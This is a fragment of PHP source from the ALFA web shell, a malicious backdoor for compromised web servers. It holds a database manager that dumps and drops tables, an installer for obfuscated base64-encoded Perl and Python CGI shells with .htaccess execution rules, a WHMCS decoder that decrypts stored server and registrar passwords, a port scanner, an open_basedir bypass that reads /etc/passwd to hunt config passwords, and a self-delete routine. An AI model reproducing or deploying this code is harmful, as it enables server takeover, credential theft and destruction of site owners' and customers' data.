'; alfafooter(); } function alfaSql_manager_api() { $db = $_POST["alfa1"]; $type = $_POST["alfa2"]; $sql_count = $_POST["alfa3"] == "true" ? true : false; $db = @json_decode($db, true); $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]); @mysqli_set_charset($conn, "utf8"); if ($conn) { if ($type == "load_all_tables") { $tables = array(); $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('".implode("','", $db["databases"])."');"); $count = 0; while ($row = @mysqli_fetch_assoc($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row["table_schema"].'`.`'.$row["table_name"].'`'); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count); } foreach ($db["databases"] as $db) { if (!isset($tables[$db])) { $tables[$db] = null; } } echo @json_encode($tables); } elseif ($type == "dump_drop") { if ($db["mode"] == "drop") { foreach ($db["tables"] as $table) { @mysqli_query($conn, "DROP TABLE `".$table."`;"); } $tables = array(); $q_tables = @mysqli_query($conn, "SHOW TABLES;"); $count = 0; while ($row = @mysqli_fetch_array($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`'); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = array("name" => $row[0], "count" => (int)$count); } echo @json_encode($tables); } else { if (strlen(alfaEx("mysqldump")) > 0) { alfaEx("mysqldump --single-transaction --host=\"".$db["host"]."\" --user=\"".$db["user"]."\" --password=\"".$db["pass"]."\" ".$db["db"]." ".implode(" ", $db["tables"])." > ".$db["dump_file"]); } else { $fp = @fopen($db["dump_file"], "w"); foreach ($db["tables"] as $table) { $res = @mysqli_query($conn, 'SHOW CREATE TABLE `'.$table.'`'); $create = @mysqli_fetch_array($res); $sql = "DROP TABLE IF EXISTS `".$table."`;\n" . $create[1].";\n"; if ($fp) { fwrite($fp, $sql); } else { echo($sql); } $tbl_data = @mysqli_query($conn, 'SELECT * FROM `'.$table.'`'); $head = true; while ($item = @mysqli_fetch_assoc($tbl_data)) { $columns = array(); foreach ($item as $k => $v) { if ($v == null) { $item[$k] = "''"; } elseif (is_numeric($v)) { $item[$k] = $v; } else { $item[$k] = "'".@mysqli_real_escape_string($conn, $v)."'"; } $columns[] = "`".$k."`"; } if ($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else { $sql = "\n\t,(".implode(", ", $item).')'; } if ($fp) { fwrite($fp, $sql); } else { echo($sql); } } if (!$head) { if ($fp) { fwrite($fp, ";\n\n"); } else { echo(";\n\n"); } } } } echo @json_encode(array("status" => true, "file" => $db["dump_file"])); } } elseif ($type == "load_tables") { $tables = array(); $q_tables = @mysqli_query($conn, "SHOW TABLES;"); $count = 0; while ($row = @mysqli_fetch_array($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`'); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = array("name" => $row[0], "count" => (int)$count); } echo @json_encode($tables); } elseif ($type == "alter") { $db["alter"]["type"] = strtolower($db["alter"]["type"]); $inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")"; $text_input = array("longtext", "text", "mediumtext", "tinytext"); if (in_array($db["alter"]["type"], $text_input)) { $inputs = $db["alter"]["type"]; } @mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs); $error = @mysqli_error($conn); if ($error) { echo $error; } else { echo "ok"; } } elseif ($type == "edit" || $type == "delete" || $type == "delete_all") { if ($type == "edit") { $q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = '".addslashes($db["key"])."' LIMIT 0,1"); $row = @mysqli_fetch_assoc($q); if ($row) { $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'"); $columns = array(); $edit_data = array(); while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $input = array("col_type" => $row2["COLUMN_TYPE"]); $row2["type"] = strtolower($row2["type"]); switch ($row2["type"]) { case "longtext": case "text": case "mediumtext": case "tinytext": $input["tag"] = "textarea"; break; case "int": case "smallint": case "bigint": case "tinyint": case "mediumint": $input["tag"] = "input"; $input["type"] = "number"; break; default: $input["tag"] = "input"; $input["type"] = "text"; } $columns[$row2["name"]] = $input; } foreach ($row as $key => $v) { $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]); } echo @json_encode($edit_data); } } else { if ($type == "delete_all") { $rows = implode("', '", $db["rows"]); } else { $rows = addslashes($db["key"]); } $query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN ('".$rows."')"; @mysqli_query($conn, $query); $error = @mysqli_error($conn); if ($error) { $status = false; } else { $status = true; } echo @json_encode(array("status" => $status, "error" => $error, "query" => $query)); } } elseif ($type == "update") { $query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET "; foreach ($db["data"] as $col => $val) { $query .= "`".$col."` = '".mysqli_real_escape_string($conn, $val)."',"; } $query = substr($query, 0, -1); $query .= "WHERE `".$db["col_key"]."` = '".$db["key"]."'"; $res = @mysqli_query($conn, $query); echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn))); } elseif ($type == "insert") { $query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` "; foreach ($db["data"] as $col => $val) { $cols .= $col . ","; $vals .= "'".mysqli_real_escape_string($conn, $val)."',"; } $cols = substr($cols, 0, -1); $vals = substr($vals, 0, -1); $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")"; $res = @mysqli_query($conn, $query); echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn))); } else { $pages = 0; $title = false; $query = ""; $tbl_content = ''; $line = 0; $tables = array(); $columns = array(); if ($type == "load_data") { $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30"; $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`"); $tbl_count = @mysqli_fetch_row($tbl_count_q); $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'"); while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $columns[] = $row2; } if ($tbl_count[0] > 30) { $pages = ceil($tbl_count[0] / 30); } } elseif ($type == "query") { $query = $db["query"]; } elseif ($type == "page") { $db["page"] = (int)$db["page"] - 1; $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"] * 30).",30"; } elseif ($type == "search") { $search = ""; $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL"); foreach ($db["search"] as $col => $val) { $search_noval_r = in_array($val["opt"], $search_noval); if (empty($val["value"]) && !$search_noval_r) { continue; } if (strstr($val["opt"], "...") || $search_noval_r) { $val["opt"] = str_replace("...", $val["value"], $val["opt"]); $search .= $col . " " . $val["opt"] . " AND "; } else { $search .= $col . " " . $val["opt"] . " '".addslashes($val["value"])."' AND "; } } $search .= "1=1"; $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search; } $q_tables = @mysqli_query($conn, $query); if (!$q_tables) { echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query)); return false; } $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($db["db"])."' AND TABLE_NAME = '".@addslashes($db["table"])."' AND COLUMN_KEY = 'PRI'"); if ($col_key) { $col_key = @mysqli_fetch_row($col_key); $col_key = $col_key[0]; if (!empty($col_key)) { $tbl_content = '
'; } } else { $col_key = false; } while ($item = @mysqli_fetch_assoc($q_tables)) { if (!$title) { $tbl_content .= ''; if ($col_key) { $tbl_content .= ''; } foreach ($item as $key => $value) { $tbl_content .= ''; } reset($item); $title = true; $tbl_content .= ''; } if ($col_key) { $cacheMsg = ''; } $tbl_content .= ''.$cacheMsg; $line++; foreach ($item as $key => $value) { if ($value == null) { $tbl_content .= ''; } else { $tbl_content .= ''; } } $tbl_content .= ''; } $tbl_content .= '
EditDelete'.$key.'
EditDelete
null'.nl2br(htmlspecialchars($value)).'
'; if (!$title) { $tbl_content = "
Table is empty...
"; } echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query)); } @mysqli_close($conn); } } function alfaselfrm() { if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'yes') { echo(__pre().'
'); if (@unlink($GLOBALS['__file_path'])) { echo('Shell has been removed :)'); } else { echo 'unlink error!'; } echo('
'); } if (isset($_POST['alfa1']) && $_POST['alfa1'] != 'yes') { echo "
"; echo "

"; echo '

Do you want to destroy me?!
Yes'; echo '

'; } } function alfacgishell() { alfahead(); $div = ""; alfaCreateParentFolder(); @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__); if (!in_array($_POST['alfa1'], array('perl','py'))) { $div = "
"; echo '

| CGI Shell |

| Perl | | Python | '; } if (isset($_POST['alfa1']) && in_array($_POST['alfa1'], array('perl','py'))) { @mkdir('cgialfa', 0755); @chdir('cgialfa'); alfacgihtaccess('cgi'); $name = $_POST['alfa1'].'.alfa'; $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));'; ; $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'\',\'exec\'))'; if ($_POST['alfa1'] == 'perl') { $code = $perl; } else { $code = $py; } if (__write_file($name, $code)) { @chmod($name, 0755); echo ''; } } echo $div; alfafooter(); } function alfaWhmcs() { alfahead(); echo '
'; function decrypt($string, $cc_encryption_hash) { $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen($hash_key); $string = __ZGVjb2Rlcg($string); $tmp_iv = substr($string, 0, $hash_length); $string = substr($string, $hash_length, strlen($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen($string)) { if (($c != 0 and $c % $hash_length == 0)) { $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); } $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); ++$c; } return $out; } function _hash($string) { if (function_exists('sha1')) { $hash = sha1($string); } else { $hash = md5($string); } $out = ''; $c = 0; while ($c < strlen($hash)) { $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } AlfaNum(8, 9, 10); echo "

| WHMCS DeCoder |

".getConfigHtml('whmcs')."

"; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50') ); create_table($table); echo "

"; if ($_POST['alfa5'] != '') { $db_host = ($_POST['alfa7']); $db_username = ($_POST['alfa3']); $db_password = ($_POST['alfa4']); $db_name = ($_POST['alfa5']); $cc_encryption_hash = ($_POST['alfa6']); echo __pre(); $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn)); $query = mysqli_query($conn, "SELECT * FROM tblservers"); $num = mysqli_num_rows($query); if ($num > 0) { for ($i = 0; $i <= $num - 1; $i++) { $v = @mysqli_fetch_array($query); $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo("
"); $password = decrypt($v['password'], $cc_encryption_hash); echo(""); echo(""); echo(""); echo(""); echo(""); echo(""); echo "
Type$type
Active$active
Hostname$hostname
Ip$ipaddress
Username$username
Password$password


"; } $query1 = @mysqli_query($conn, "SELECT * FROM tblregistrars"); $num1 = @mysqli_num_rows($query1); if ($num1 > 0) { for ($i = 0; $i <= $num1 - 1; $i++) { $v = mysqli_fetch_array($query1); $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt($v['value'], $cc_encryption_hash); if ($value == "") { $value = 0; } echo("
Domain Reseller
"); echo("
"); echo(""); echo(""); echo(""); echo "
Register$registrar
Setting$setting
Value$value


"; } } } else { __alert('tblservers is Empty...!'); }; } echo "
"; alfafooter(); } function alfaportscanner() { alfahead(); echo '

| Port Scaner |

Host:
Port start:
Port end:

'; $start = strip_tags($_POST['alfa2']); $end = strip_tags($_POST['alfa3']); $host = strip_tags($_POST['alfa4']); if (isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])) { echo __pre(); $packetContent = "GET / HTTP/1.1\r\n\r\n"; if (ctype_xdigit($packetContent)) { $packetContent = @pack("H*", $packetContent); } else { $packetContent = str_replace(array("\r","\n"), "", $packetContent); $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent); } for ($i = $start; $i <= $end; $i++) { $sock = @fsockopen($host, $i, $errno, $errstr, 3); if ($sock) { stream_set_timeout($sock, 5); fwrite($sock, $packetContent."\r\n\r\n\x00"); $counter = 0; $maxtry = 1; $bin = ""; do { $line = fgets($sock, 1024); if (trim($line) == "") { $counter++; } $bin .= $line; } while ($counter < $maxtry); fclose($sock); echo "

Port $i is open

"; echo "

"; } flush(); } } echo '
'; alfafooter(); } function alfacgihtaccess($m, $d = '', $symname = false) { $readme = ""; if ($symname) { $readme = "\nReadmeName ".trim($symname); } if ($m == 'cgi') { $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa"; } elseif ($m == 'sym') { $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all"; } elseif ($m == 'shtml') { $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml"; } @__write_file($d . ".htaccess", $code); } function alfabasedir() { alfahead(); echo '

| Open Base Dir |

'; $passwd = _alfa_file('/etc/passwd'); if (is_array($passwd)) { $users = array(); $makepwd = alfaMakePwd(); $basedir = @ini_get('open_basedir'); $safe_mode = @ini_get('safe_mode'); if (_alfa_can_runCommand(true, false) && ($basedir || $safe_mode)) { $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP"; $tmp_path = alfaWriteTocgiapi("basedir.alfa", $bash); $bash_users = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd, false, true, true); $users = json_decode($bash_users, true); $x = count($users); if ($x >= 2) { array_pop($users); --$x; } } if (!$basedir && !$safe_mode) { $x = 0; foreach ($passwd as $str) { $pos = strpos($str, ':'); $username = substr($str, 0, $pos); $dirz = str_replace("{user}", $username, $makepwd); if (($username != '')) { if (@is_readable($dirz)) { array_push($users, $username); $x++; } } } } echo '

'; echo "[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."
"; echo "[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."
"; echo "[~] Searching for passwords in config files...\n\n"."


"; foreach ($users as $user) { if (empty($user)) { continue; } $path = str_replace("{user}", $user, $makepwd); echo "
Change Dir ..:: $user ::..

"; } } else { echo('
[-] Error : coudn`t read /etc/passwd [-]
'); } echo '

'; echo '
'; alfafooter(); } function alfamail() { alfahead(); echo '
'; AlfaNum(8, 9, 10); echo '

| Fake Mail |

